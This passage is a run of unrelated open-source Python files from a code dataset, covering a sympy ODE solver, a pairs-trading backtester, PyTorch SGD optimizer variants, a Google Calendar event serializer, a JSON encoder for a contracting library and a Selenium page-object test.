C_n e^{r_n t} \\vec{v_n}\n\n where `C_1,C_2,...,C_n` are arbitrary constants.\n\n 2. 
When some eigenvalues are complex then in order to make the solution real,\n we take a linear combination: if `r = a + bi` has an eigenvector\n `\\vec{v} = \\vec{w_1} + i \\vec{w_2}` then to obtain real-valued solutions to\n the system, replace the complex-valued solutions `e^{rx} \\vec{v}`\n with real-valued solution `e^{ax} (\\vec{w_1} \\cos(bx) - \\vec{w_2} \\sin(bx))`\n and for `r = a - bi` replace the solution `e^{-r x} \\vec{v}` with\n `e^{ax} (\\vec{w_1} \\sin(bx) + \\vec{w_2} \\cos(bx))`\n\n 3. If some eigenvalues are repeated. Then we get fewer than `n` linearly\n independent eigenvectors, we miss some of the solutions and need to\n construct the missing ones. We do this via generalized eigenvectors, vectors\n which are not eigenvectors but are close enough that we can use to write\n down the remaining solutions. For a eigenvalue `r` with eigenvector `\\vec{w}`\n we obtain `\\vec{w_2},...,\\vec{w_k}` using\n\n .. math:: (A - r I) . \\vec{w_2} = \\vec{w}\n\n .. math:: (A - r I) . \\vec{w_3} = \\vec{w_2}\n\n .. math:: \\vdots\n\n .. math:: (A - r I) . \\vec{w_k} = \\vec{w_{k-1}}\n\n Then the solutions to the system for the eigenspace are `e^{rt} [\\vec{w}],\n e^{rt} [t \\vec{w} + \\vec{w_2}], e^{rt} [\\frac{t^2}{2} \\vec{w} + t \\vec{w_2} + \\vec{w_3}],\n ...,e^{rt} [\\frac{t^{k-1}}{(k-1)!} \\vec{w} + \\frac{t^{k-2}}{(k-2)!} \\vec{w_2} +...+ t \\vec{w_{k-1}}\n + \\vec{w_k}]`\n\n So, If `\\vec{y_1},...,\\vec{y_n}` are `n` solution of obtained from three\n categories of `A`, then general solution to the system `\\vec{y'} = A . \\vec{y}`\n\n .. math:: \\vec{y} = C_1 \\vec{y_1} + C_2 \\vec{y_2} + \\cdots + C_n \\vec{y_n}\n\n \"\"\"\n eq = match_['eq']\n func = match_['func']\n fc = match_['func_coeff']\n n = len(eq)\n t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]\n constants = numbered_symbols(prefix='C', cls=Symbol, start=1)\n\n # This needs to be modified in future so that fc is only of type Matrix\n M = -fc if type(fc) is Matrix else Matrix(n, n, lambda i,j:-fc[i,func[j],0])\n\n P, J = matrix_exp_jordan_form(M, t)\n P = simplify(P)\n Cvect = Matrix(list(next(constants) for _ in range(n)))\n sol_vector = P * (J * Cvect)\n\n sol_vector = [collect(s, ordered(J.atoms(exp)), exact=True) for s in sol_vector]\n\n sol_dict = [Eq(func[i], sol_vector[i]) for i in range(n)]\n return sol_dict\n\n\ndef _matrix_is_constant(M, t):\n \"\"\"Checks if the matrix M is independent of t or not.\"\"\"\n return all(coef.as_independent(t, as_Add=True)[1] == 0 for coef in M)\n\n\ndef _canonical_equations(eqs, funcs, t):\n \"\"\"Helper function that solves for first order derivatives in a system\"\"\"\n from sympy.solvers.solvers import solve\n\n # For now the system of ODEs dealt by this function can have a\n # maximum order of 1.\n if any(ode_order(eq, func) > 1 for eq in eqs for func in funcs):\n msg = \"Cannot represent system in {}-order canonical form\"\n raise ODEOrderError(msg.format(1))\n\n canon_eqs = solve(eqs, *[func.diff(t) for func in funcs], dict=True)\n\n if len(canon_eqs) != 1:\n raise ODENonlinearError(\"System of ODEs is nonlinear\")\n\n canon_eqs = canon_eqs[0]\n canon_eqs = [Eq(func.diff(t), canon_eqs[func.diff(t)]) for func in funcs]\n\n return canon_eqs\n\n\ndef neq_nth_linear_constant_coeff_match(eqs, funcs, t):\n r\"\"\"\n Returns a dictionary with details of the eqs if every equation is constant coefficient\n and linear else returns None\n\n Explanation\n ===========\n\n This function takes the eqs, converts it into a form Ax = b where x is a vector of terms\n 
containing dependent variables and their derivatives till their maximum order. If it is\n possible to convert eqs into Ax = b, then all the equations in eqs are linear otherwise\n they are non-linear.\n\n To check if the equations are constant coefficient, we need to check if all the terms in\n A obtained above are constant or not.\n\n To check if the equations are homogeneous or not, we need to check if b is a zero matrix\n or not.\n\n Parameters\n ==========\n\n eqs: List\n List of ODEs\n funcs: List\n List of dependent variables\n t: Symbol\n Independent variable of the equations in eqs\n\n Returns\n =======\n\n match = {\n 'no_of_equation': len(eqs),\n 'eq': eqs,\n 'func': funcs,\n 'order': order,\n 'is_linear': is_linear,\n 'is_constant': is_constant,\n 'is_homogeneous': is_homogeneous,\n }\n\n Dict or None\n Dict with values for keys:\n 1. no_of_equation: Number of equations\n 2. eq: The set of equations\n 3. func: List of dependent variables\n 4. order: A dictionary that gives the order of the\n dependent variable in eqs\n 5. is_linear: Boolean value indicating if the set of\n equations are linear or not.\n 6. is_constant: Boolean value indicating if the set of\n equations have constant coefficients or not.\n 7. is_homogeneous: Boolean value indicating if the set of\n equations are homogeneous or not.\n This Dict is the answer returned if the eqs are linear and constant\n coefficient. Otherwise, None is returned.\n\n \"\"\"\n\n # Error for i == 0 can be added but isn't for now\n\n # Removing the duplicates from the list of funcs\n # meanwhile maintaining the order. This is done\n # since the line in classify_sysode: list(set(funcs)\n # cause some test cases to fail when gives different\n # results in different versions of Python.\n funcs = list(uniq(funcs))\n\n # Check for len(funcs) == len(eqs)\n if len(funcs) != len(eqs):\n raise ValueError(\"Number of functions given is not equal to the number of equations %s\" % funcs)\n\n # ValueError when functions have more than one arguments\n for func in funcs:\n if len(func.args) != 1:\n raise ValueError(\"dsolve() and classify_sysode() work with \"\n \"functions of one variable only, not %s\" % func)\n\n # Getting the func_dict and order using the helper\n # function\n order = _get_func_order(eqs, funcs)\n\n if not all(order[func] == 1 for func in funcs):\n return None\n else:\n\n # TO be changed when this function is updated.\n # This will in future be updated as the maximum\n # order in the system found.\n system_order = 1\n\n # Not adding the check if the len(func.args) for\n # every func in funcs is 1\n\n # Linearity check\n try:\n canon_eqs = _canonical_equations(eqs, funcs, t)\n As, b = linear_ode_to_matrix(canon_eqs, funcs, t, system_order)\n\n # When the system of ODEs is non-linear, an ODENonlinearError is raised.\n # When system has an order greater than what is specified in system_order,\n # ODEOrderError is raised.\n # This function catches these errors and None is returned\n except (ODEOrderError, ODENonlinearError):\n return None\n\n A = As[1]\n is_linear = True\n\n # Constant coefficient check\n is_constant = _matrix_is_constant(A, t)\n\n # Homogeneous check\n is_homogeneous = True if b.is_zero_matrix else False\n\n match = {\n 'no_of_equation': len(eqs),\n 'eq': eqs,\n 'func': funcs,\n 'order': order,\n 'is_linear': is_linear,\n 'is_constant': is_constant,\n 'is_homogeneous': is_homogeneous,\n }\n\n # The match['is_linear'] check will be added in the future when this\n # function becomes ready to deal with non-linear 
systems of ODEs\n if match['is_constant']:\n\n # Converting the equation into canonical form if the\n # equation is first order. There will be a separate\n # function for this in the future.\n if all([order[func] == 1 for func in funcs]) and match['is_homogeneous']:\n match['func_coeff'] = A\n match['type_of_equation'] = \"type1\"\n\n return match\n\n return None\n","repo_name":"PandeyAditya14/Audio-Encryption","sub_path":"venv/lib/python3.8/site-packages/sympy/solvers/ode/systems.py","file_name":"systems.py","file_ext":"py","file_size_in_byte":20323,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"19687687251","text":"from statsmodels.tsa.stattools import coint\nimport sys\nsys.path.append(\"../quant\")\nfrom alphabeta_regression import normal_equation\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport backtrader as bt\nfrom backtrader.indicators import PeriodN\nimport json\n\nclass PairChecker:\n\n\n def __init__(self, cluster, cluster_dataframe):\n\n self.cluster = cluster\n self.cluster_size = len(cluster)\n self.data = cluster_dataframe\n self.pairs = []\n\n def check_cointegration(self, cutoff=0.05, hurst_threshold=0.5):\n \"\"\"Carry out augmented dicky-fuller test on X\"\"\"\n number_of_checks = 0\n for i in range(self.cluster_size):\n for j in range(i+1, self.cluster_size):\n number_of_checks = number_of_checks + 1\n\n try:\n print(f\"Checking for cointegration between {self.cluster[i]}--{self.cluster[j]}\")\n\n S1 = self.data.iloc[:, i]\n S2 = self.data.iloc[:, j]\n \n alpha, beta = normal_equation(S2.values.reshape(-1,1), S1.values.reshape(-1,1))\n spread = S2 - beta * S1\n\n p_value = coint(S1,S2)[1]\n\n if(p_value) > cutoff:\n pass\n #print(\"Series is unlikely cointegrated\")\n else:\n hurst_value = self.check_hurst(spread)\n \n if hurst_value < hurst_threshold:\n halflife_value = self.check_half_life(spread)\n print(halflife_value)\n if halflife_value > 1 and halflife_value < 100:\n #print(\"Series is likely cointegrated\")\n self.pairs.append( [self.cluster[i], self.cluster[j]])\n\n except Exception as e:\n print(e)\n #print(\"Error...\")\n \n return self.pairs, number_of_checks\n\n def check_hurst(self, spread):\n spread = spread.values\n\n lags = range(2,100)\n #tau = [np.sqrt(np.std(np.subtract(spread[lag:], spread[:-lag]))) for lag in lags]\n \n #poly = np.polyfit(np.log(lags), np.log(tau), 1)\n\n variancetau = []; tau = []\n\n for lag in lags: \n tau.append(lag)\n\n pp = np.subtract(spread[lag:], spread[:-lag]) \n variancetau.append(np.var(pp))\n \n m = np.polyfit(np.log(tau),np.log(variancetau),1)\n\n\n hurst = m[0] / 2\n\n\n return hurst\n\n return poly[0] * 2.0\n\n def check_half_life(self, spread):\n spread = spread.values\n spread_lag = np.roll(spread, 1)\n spread_lag[0] = 0\n spread_ret = spread - spread_lag\n spread_ret[0] = 0\n\n alpha, beta = normal_equation(spread_ret[1:].reshape(-1,1), spread_lag[1:].reshape(-1,1))\n halflife = -np.log(2) / beta\n\n return halflife\n\n\n\nclass OLS_Slope_InterceptN(PeriodN):\n '''\n Calculates a linear regression using ``statsmodel.OLS`` (Ordinary least\n squares) of data1 on data0\n Uses ``pandas`` and ``statsmodels``\n '''\n _mindatas = 2 # ensure at least 2 data feeds are passed\n\n packages = (\n ('pandas', 'pd'),\n ('statsmodels.api', 'sm'),\n )\n lines = ('slope', 'intercept',)\n params = (\n ('period', 10),\n )\n\n def next(self):\n p0 = pd.Series(self.data0.get(size=len(self.data0))).values\n p1 = 
pd.Series(self.data1.get(size=len(self.data1))).values\n\n #alpha, beta = normal_equation(p1.reshape(-1,1), p0.reshape(-1,1))\n p1 = sm.add_constant(p1)\n intercept, slope = sm.OLS(p0, p1).fit().params\n \n\n self.lines.slope[0] = intercept\n self.lines.intercept[0] = slope\n\n\nclass OLS_TransformationN(PeriodN):\n '''\n Calculates the ``zscore`` for data0 and data1. Although it doesn't directly\n uses any external package it relies on ``OLS_SlopeInterceptN`` which uses\n ``pandas`` and ``statsmodels``\n '''\n _mindatas = 2 # ensure at least 2 data feeds are passed\n lines = ('spread', 'spread_mean', 'spread_std', 'zscore',)\n params = (('period', 10),)\n\n def __init__(self):\n slint = OLS_Slope_InterceptN(*self.datas)\n\n spread = self.data0 - (slint.slope * self.data1 + slint.intercept)\n self.l.spread = spread\n\n self.l.spread_mean = bt.ind.SMA(spread, period=self.p.period)\n self.l.spread_std = bt.ind.StdDev(spread, period=self.p.period)\n self.l.zscore = (spread - self.l.spread_mean) / self.l.spread_std\n\n\nclass TradeAnalyzer:\n\n def __init__(self, analyzer_list):\n self.summary_dict = dict(analyzer_list.get_analysis().lvalues()[0])\n self.win_loss_dict = dict(analyzer_list.get_analysis().lvalues()[1])\n self.win_trades = dict(analyzer_list.get_analysis().lvalues()[3])\n self.loss_trades = dict(analyzer_list.get_analysis().lvalues()[4])\n\n\n def get_summary(self):\n return self.summary_dict\n\n def get_streak(self):\n x = [{i:dict(self.win_loss_dict[i])} for i in self.win_loss_dict]\n return x[0],x[1]\n\n def get_wins(self):\n win_trades_info = dict(self.win_trades['pnl'])\n win_trades_info['number'] = self.win_trades['total']\n win_trades_info['type'] = 'wins'\n\n return win_trades_info\n\n def get_losses(self):\n loss_trades_info = dict(self.loss_trades['pnl'])\n loss_trades_info['number'] = self.loss_trades['total']\n loss_trades_info['type'] = 'losses'\n return loss_trades_info\n\n\n\n","repo_name":"ChetanTayal138/Trading-Toolkit","sub_path":"backtester/utils/pairs.py","file_name":"pairs.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"5626750419","text":"#! 
/Users/zellyn/.ve/np/bin/python\n\nfrom train import *\n\npatchsize = 8\nvisible_size = patchsize * patchsize\nhidden_size = 25\ntarget_activation = 0.01\nlamb = 0.0001\nbeta = 3\n\ntheta = sio.loadmat('testdata/save_theta.mat')['theta']\npatches = sio.loadmat('testdata/save_patches.mat')['patches']\n\ndef sal(theta):\n return sparse_autoencoder_loss(theta, visible_size, hidden_size, lamb, target_activation, beta, patches)\nopttheta, f, d = scipy.optimize.fmin_l_bfgs_b(sal, theta, maxfun=3000, iprint=1, m=theta.size)\n\nsio.savemat('testdata/numpy-opttheta.mat', {'opttheta' : opttheta})\n","repo_name":"zellyn/deeplearning-class-2011","sub_path":"ufldl/starter/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"81"} +{"seq_id":"24900030134","text":"from datetime import date, datetime\n\nfrom tzlocal import get_localzone_name\n\nfrom gcsa.event import Event\nfrom .base_serializer import BaseSerializer\nfrom .attachment_serializer import AttachmentSerializer\nfrom .attendee_serializer import AttendeeSerializer\nfrom .conference_serializer import ConferenceSolutionSerializer, ConferenceSolutionCreateRequestSerializer\nfrom .person_serializer import PersonSerializer\nfrom .reminder_serializer import ReminderSerializer\nfrom ..conference import ConferenceSolution, ConferenceSolutionCreateRequest\n\n\nclass EventSerializer(BaseSerializer):\n type_ = Event\n\n def __init__(self, event):\n super().__init__(event)\n\n @classmethod\n def _to_json(cls, event: Event):\n data = {\n 'id': event.event_id,\n 'summary': event.summary,\n 'description': event.description,\n 'location': event.location,\n 'recurrence': event.recurrence,\n 'colorId': event.color_id,\n 'visibility': event.visibility,\n 'attendees': [AttendeeSerializer.to_json(a) for a in event.attendees],\n 'guestsCanInviteOthers': event.guests_can_invite_others,\n 'guestsCanModify': event.guests_can_modify,\n 'guestsCanSeeOtherGuests': event.guests_can_see_other_guests,\n 'transparency': event.transparency,\n 'reminders': {\n 'useDefault': event.default_reminders,\n 'overrides': [ReminderSerializer.to_json(r) for r in event.reminders]\n },\n 'attachments': [AttachmentSerializer.to_json(a) for a in event.attachments],\n **event.other\n }\n\n if isinstance(event.start, datetime) and isinstance(event.end, datetime):\n data['start'] = {\n 'dateTime': event.start.isoformat(),\n 'timeZone': event.timezone\n }\n data['end'] = {\n 'dateTime': event.end.isoformat(),\n 'timeZone': event.timezone\n }\n elif isinstance(event.start, date) and isinstance(event.end, date):\n data['start'] = {'date': event.start.isoformat()}\n data['end'] = {'date': event.end.isoformat()}\n\n if event.default_reminders:\n data['reminders'] = {\n 'useDefault': True\n }\n else:\n data['reminders'] = {\n 'useDefault': False\n }\n if event.reminders:\n data['reminders']['overrides'] = [ReminderSerializer.to_json(r) for r in event.reminders]\n\n if event.conference_solution is not None:\n if isinstance(event.conference_solution, ConferenceSolution):\n data['conferenceData'] = ConferenceSolutionSerializer.to_json(event.conference_solution)\n elif isinstance(event.conference_solution, ConferenceSolutionCreateRequest):\n data['conferenceData'] = ConferenceSolutionCreateRequestSerializer.to_json(event.conference_solution)\n\n data = EventSerializer._remove_empty_values(data)\n\n return data\n\n @staticmethod\n def _to_object(json_event):\n timezone = None\n\n start = None\n 
start_data = json_event.pop('start', None)\n if start_data is not None:\n if 'date' in start_data:\n start = EventSerializer._get_datetime_from_string(start_data['date']).date()\n else:\n start = EventSerializer._get_datetime_from_string(start_data['dateTime'])\n timezone = start_data.get('timeZone', get_localzone_name())\n\n end = None\n end_data = json_event.pop('end', None)\n if end_data is not None:\n if 'date' in end_data:\n end = EventSerializer._get_datetime_from_string(end_data['date']).date()\n else:\n end = EventSerializer._get_datetime_from_string(end_data['dateTime'])\n\n updated = json_event.pop('updated', None)\n if updated:\n updated = EventSerializer._get_datetime_from_string(updated)\n\n created = json_event.pop('created', None)\n if created:\n created = EventSerializer._get_datetime_from_string(created)\n\n attendees_json = json_event.pop('attendees', [])\n attendees = [AttendeeSerializer.to_object(a) for a in attendees_json]\n\n reminders_json = json_event.pop('reminders', {})\n reminders = [ReminderSerializer.to_object(r) for r in reminders_json.get('overrides', [])]\n\n attachments_json = json_event.pop('attachments', [])\n attachments = [AttachmentSerializer.to_object(a) for a in attachments_json]\n\n conference_data = json_event.pop('conferenceData', None)\n if conference_data is not None:\n create_request = conference_data.get('createRequest', {})\n if create_request is None or create_request.get('status', {}).get('statusCode', None) in (None, 'success'):\n conference_solution = ConferenceSolutionSerializer.to_object(conference_data)\n else:\n conference_solution = ConferenceSolutionCreateRequestSerializer.to_object(conference_data)\n else:\n conference_solution = None\n\n creator_data = json_event.pop('creator', None)\n if creator_data is not None:\n creator = PersonSerializer.to_object(creator_data)\n else:\n creator = None\n\n organizer_data = json_event.pop('organizer', None)\n if organizer_data is not None:\n organizer = PersonSerializer.to_object(organizer_data)\n else:\n organizer = None\n\n return Event(\n json_event.pop('summary', None),\n start=start,\n end=end,\n timezone=timezone,\n event_id=json_event.pop('id', None),\n description=json_event.pop('description', None),\n location=json_event.pop('location', None),\n recurrence=json_event.pop('recurrence', None),\n color_id=json_event.pop('colorId', None),\n visibility=json_event.pop('visibility', None),\n attendees=attendees,\n attachments=attachments,\n reminders=reminders,\n conference_solution=conference_solution,\n default_reminders=reminders_json.pop('useDefault', False),\n guests_can_invite_others=json_event.pop('guestsCanInviteOthers', True),\n guests_can_modify=json_event.pop('guestsCanModify', False),\n guests_can_see_other_guests=json_event.pop('guestsCanSeeOtherGuests', True),\n transparency=json_event.pop('transparency', None),\n _creator=creator,\n _organizer=organizer,\n _created=created,\n _updated=updated,\n _recurring_event_id=json_event.pop('recurringEventId', None),\n **json_event\n )\n","repo_name":"kuzmoyev/google-calendar-simple-api","sub_path":"gcsa/serializers/event_serializer.py","file_name":"event_serializer.py","file_ext":"py","file_size_in_byte":6860,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"81"} +{"seq_id":"71189631624","text":"\"\"\"Code copied from https://github.com/HuangxingLin123/Learning-Rate-Dropout/blob/master/cifar10/sgd_lrd.py\"\"\"\nimport torch\nfrom torch.optim.optimizer import Optimizer\n\n\nclass 
SGD_LRD(Optimizer):\n def __init__(self, params, lr, momentum=0, dampening=0,\n weight_decay=0, dropout=0.0, nesterov=False):\n if lr < 0.0:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if momentum < 0.0:\n raise ValueError(\"Invalid momentum value: {}\".format(momentum))\n if weight_decay < 0.0:\n raise ValueError(\"Invalid weight_decay value: {}\".format(weight_decay))\n\n defaults = dict(lr=lr, momentum=momentum, dampening=dampening,\n weight_decay=weight_decay, nesterov=nesterov,dropout=dropout)\n if nesterov and (momentum <= 0 or dampening != 0):\n raise ValueError(\"Nesterov momentum requires a momentum and zero dampening\")\n super(SGD_LRD, self).__init__(params, defaults)\n\n def __setstate__(self, state):\n super(SGD_LRD, self).__setstate__(state)\n for group in self.param_groups:\n group.setdefault('nesterov', False)\n\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n\n Arguments:\n closure (callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n weight_decay = group['weight_decay']\n momentum = group['momentum']\n dampening = group['dampening']\n nesterov = group['nesterov']\n\n for p in group['params']:\n if p.grad is None:\n continue\n d_p = p.grad.data\n\n ## mask\n m = torch.ones_like(p.data) * group['dropout']\n mask = torch.bernoulli(m)\n\n if weight_decay != 0:\n d_p.add_(weight_decay, p.data)\n if momentum != 0:\n param_state = self.state[p]\n if 'momentum_buffer' not in param_state:\n buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()\n else:\n buf = param_state['momentum_buffer']\n buf.mul_(momentum).add_(1 - dampening, d_p)\n\n ##dropout learning rate\n lr_dropout = group['lr']*mask\n I_buf = lr_dropout * buf.clone()\n\n p.data.add_(-1, I_buf)\n\n return loss\n\n\n# Code copied from https://github.com/AtheMathmo/AggMo/blob/master/src/aggmo.py\nclass SGDAggMo(Optimizer):\n r\"\"\"Implements Aggregated Momentum Gradient Descent\n \"\"\"\n\n def __init__(self, params, lr, betas=[0.0, 0.9, 0.99], weight_decay=0):\n defaults = dict(lr=lr, betas=betas, weight_decay=weight_decay)\n super(SGDAggMo, self).__init__(params, defaults)\n\n @classmethod\n def from_exp_form(cls, params, lr, a=0.1, k=3, weight_decay=0):\n betas = [1 - a**i for i in range(k)]\n return cls(params, lr, betas, weight_decay)\n\n def __setstate__(self, state):\n super(SGDAggMo, self).__setstate__(state)\n\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n Arguments:\n closure (callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n weight_decay = group['weight_decay']\n betas = group['betas']\n total_mom = float(len(betas))\n\n for p in group['params']:\n if p.grad is None:\n continue\n d_p = p.grad.data\n if weight_decay != 0:\n d_p.add_(weight_decay, p.data)\n param_state = self.state[p]\n if 'momentum_buffer' not in param_state:\n param_state['momentum_buffer'] = {}\n for beta in betas:\n param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)\n for beta in betas:\n buf = param_state['momentum_buffer'][beta]\n # import pdb; pdb.set_trace()\n buf.mul_(beta).add_(d_p)\n p.data.sub_(group['lr'] / total_mom , buf)\n return loss\n\n def zero_momentum_buffers(self):\n for group in self.param_groups:\n betas = group['betas']\n for p in group['params']:\n 
param_state = self.state[p]\n param_state['momentum_buffer'] = {}\n for beta in betas:\n param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)\n\n def update_hparam(self, name, value):\n for param_group in self.param_groups:\n param_group[name] = value\n","repo_name":"ifeherva/optimizer-benchmark","sub_path":"optimizers/sgd.py","file_name":"sgd.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"81"} +{"seq_id":"37688155806","text":"import json\nimport decimal\nfrom contracting.stdlib.bridge.time import Datetime, Timedelta\nfrom contracting.stdlib.bridge.decimal import ContractingDecimal, MAX_LOWER_PRECISION, fix_precision\nfrom contracting.config import INDEX_SEPARATOR, DELIMITER\n\nMONGO_MIN_INT = -(2 ** 63)\nMONGO_MAX_INT = 2 ** 63 - 1\n\n##\n# ENCODER CLASS\n# Add to this to encode Python types for storage.\n# Right now, this is only for datetime types. They are passed into the system as ISO strings, cast into Datetime objs\n# and stored as dicts. Is there a better way? I don't know, maybe.\n##\n\ndef safe_repr(obj, max_len=1024):\n try:\n r = obj.__repr__()\n rr = r.split(' at 0x')\n if len(rr) > 1:\n return rr[0] + '>'\n return rr[0][:max_len]\n except:\n return None\n\nclass Encoder(json.JSONEncoder):\n def default(self, o, *args):\n if isinstance(o, Datetime) or o.__class__.__name__ == Datetime.__name__:\n return {\n '__time__': [o.year, o.month, o.day, o.hour, o.minute, o.second, o.microsecond]\n }\n elif isinstance(o, Timedelta) or o.__class__.__name__ == Timedelta.__name__:\n return {\n '__delta__': [o._timedelta.days, o._timedelta.seconds]\n }\n elif isinstance(o, bytes):\n return {\n '__bytes__': o.hex()\n }\n elif isinstance(o, decimal.Decimal) or o.__class__.__name__ == decimal.Decimal.__name__:\n #return format(o, f'.{MAX_LOWER_PRECISION}f')\n return {\n '__fixed__': str(fix_precision(o))\n }\n\n elif isinstance(o, ContractingDecimal) or o.__class__.__name__ == ContractingDecimal.__name__:\n #return format(o._d, f'.{MAX_LOWER_PRECISION}f')\n return {\n '__fixed__': str(fix_precision(o._d))\n }\n #else:\n # return safe_repr(o)\n return super().default(o)\n\ndef encode_int(value: int):\n if MONGO_MIN_INT < value and value < MONGO_MAX_INT:\n return value\n\n return {\n '__big_int__': str(value)\n }\n\ndef encode_ints_in_dict(data: dict):\n d = dict()\n for k, v in data.items():\n if isinstance(v, int):\n d[k] = encode_int(v)\n elif isinstance(v, dict):\n d[k] = encode_ints_in_dict(v)\n elif isinstance(v, list):\n d[k] = []\n for i in v:\n if isinstance(i, dict):\n d[k].append(encode_ints_in_dict(i))\n elif isinstance(i, int):\n d[k].append(encode_int(i))\n else:\n d[k].append(i)\n else:\n d[k] = v\n\n return d\n\n# JSON library from Python 3 doesn't let you instantiate your custom Encoder. You have to pass it as an obj to json\ndef encode(data: str):\n \"\"\" NOTE:\n Normally encoding behavior is overriden in 'default' method inside\n a class derived from json.JSONEncoder. 
Unfortunately this can be done only\n for custom types.\n \n Due to MongoDB integer limitation (8 bytes), we need to preprocess 'big' integers.\n \"\"\"\n if isinstance(data, int):\n data = encode_int(data)\n elif isinstance(data, dict):\n data = encode_ints_in_dict(data)\n\n return json.dumps(data, cls=Encoder, separators=(',', ':'))\n\ndef as_object(d):\n if '__time__' in d:\n return Datetime(*d['__time__'])\n elif '__delta__' in d:\n return Timedelta(days=d['__delta__'][0], seconds=d['__delta__'][1])\n elif '__bytes__' in d:\n return bytes.fromhex(d['__bytes__'])\n elif '__fixed__' in d:\n return ContractingDecimal(d['__fixed__'])\n elif '__big_int__' in d:\n return int(d['__big_int__'])\n return dict(d)\n\n\n# Decode has a hook for JSON objects, which are just Python dictionaries. You have to specify the logic in this hook.\n# This is not uniform, but this is how Python made it.\ndef decode(data):\n if data is None:\n return None\n\n if isinstance(data, bytes):\n data = data.decode()\n\n try:\n return json.loads(data, object_hook=as_object)\n except json.decoder.JSONDecodeError as e:\n return None\n\n\ndef make_key(contract, variable, args=[]):\n contract_variable = INDEX_SEPARATOR.join((contract, variable))\n if args:\n return DELIMITER.join((contract_variable, *args))\n return contract_variable\n\n\ndef encode_kv(key, value):\n # if key is None:\n # key = ''\n #\n # if value is None:\n # value = ''\n\n k = key.encode()\n v = encode(value).encode()\n return k, v\n\n\ndef decode_kv(key, value):\n k = key.decode()\n v = decode(value)\n # if v == '':\n # v = None\n return k, v\n\n\nTYPES = {'__fixed__', '__delta__', '__bytes__', '__time__', '__big_int__'}\ndef convert(k, v):\n if k == '__fixed__':\n return ContractingDecimal(v)\n elif k == '__delta__':\n return Timedelta(days=v[0], seconds=v[1])\n elif k == '__bytes__':\n return bytes.fromhex(v)\n elif k == '__time__':\n return Datetime(*v)\n elif k == '__big_int__':\n return int(v)\n return v\n\n\ndef convert_dict(d):\n if not isinstance(d, dict):\n return d\n\n d2 = dict()\n for k, v in d.items():\n if k in TYPES:\n return convert(k, v)\n\n elif isinstance(v, dict):\n d2[k] = convert_dict(v)\n\n elif isinstance(v, list):\n d2[k] = []\n for i in v:\n d2[k].append(convert_dict(i))\n\n else:\n d2[k] = v\n\n return d2\n","repo_name":"Lamden/contracting","sub_path":"contracting/db/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"81"} +{"seq_id":"25651021819","text":"# -*- coding=utf-8 -*-\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n__all__ = [\"YamlToArgsError\", \"yaml_to_args\"]\n\n\nclass YamlToArgsError(Exception):\n pass\n\n\ndef yaml_to_args(schema, doc):\n if doc is None:\n return []\n\n if not isinstance(doc, dict):\n raise YamlToArgsError(f\"The document you provided is not an object (it is {type(doc)})\")\n\n args = []\n for i, (item, (key, value)) in enumerate(zip(schema[\"accepts\"], doc.items())):\n if item[\"_name_\"] != key:\n raise YamlToArgsError(\n f\"Element #{i + 1} should be {item['_name_']!r}, {key!r} given\"\n )\n\n if item.get(\"type\") == \"object\" and value is None:\n # This happens when user is offered to edit a document like:\n # options:\n # # Use force\n # # force: false\n # and they are satisfied with the defaults\n value = {}\n\n args.append(value)\n\n return 
args\n","repo_name":"truenas/midcli","sub_path":"midcli/editor/yaml/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"81"} +{"seq_id":"27445590755","text":"from pageObject.basePage import BasePage\nfrom public.publicLogs import PublicLogs\nfrom time import sleep\nlog = PublicLogs()\n\nclass FinanceReceiptCount(BasePage):\n\n type_input = 'xpath=>//input[@ng-model=\"receiptTypeName\"]'\n type_click = 'xpath=>//div[@ui-grid=\"gridOptions\"]/div[1]/div[1]/div[1]/div[2]/div[1]/div[1]/div[1]/div[1]'\n project_click = 'xpath=>//div[@name=\"projectId\"]/div[2]/div[1]/button'\n clear_click = 'xpath=>//button[contains(text(),\"清空\")]'\n project_input = 'xpath=>//input[@aria-label=\"Search\"]'\n project_select = 'xpath=>//span[contains(text(),\"(成都)香境·香碧歌\")]'\n startno_input ='xpath=>//input[@ng-model=\"searchFormObject.startNum\"]'\n endno_input = 'xpath=>//input[@ng-model=\"searchFormObject.endNum\"]'\n search_click = 'xpath=>//button[@ng-click=\"search()\"]'\n reset_click = 'xpath=>//button[@ng-click=\"reset()\"]'\n data_a_click = 'xpath=>//div[@id=\"mainTable\"]/div[1]/div[1]/div[1]/div[2]/div[1]/div[1]'\n catdetail_a_click = 'xpath=>//span[contains(text(),\"查看明细\")]'\n data_b_click = 'xpath=>//div[@role=\"rowheader\"]/div[1]/div[1]/div[1]'\n catdetail_b_click = 'xpath=>//span[contains(text(),\"查看详情\")]'\n data_get = '//div[@class=\"pull-left\"]/table/tbody/tr'\n detail_click = 'xpath=>//a[contains(text(),\"票据明细\")]'\n close_click = 'xpath=>//button[@class=\"close\"]'\n\n def finance_type_click(self):\n self.send_keys(self.type_input, '徐州分公司增值税普通发票')\n sleep(0.5)\n self.click(self.type_click)\n log.info(u'票据段统计信息--选择票据类型')\n sleep(0.5)\n\n def finance_project_click(self):\n 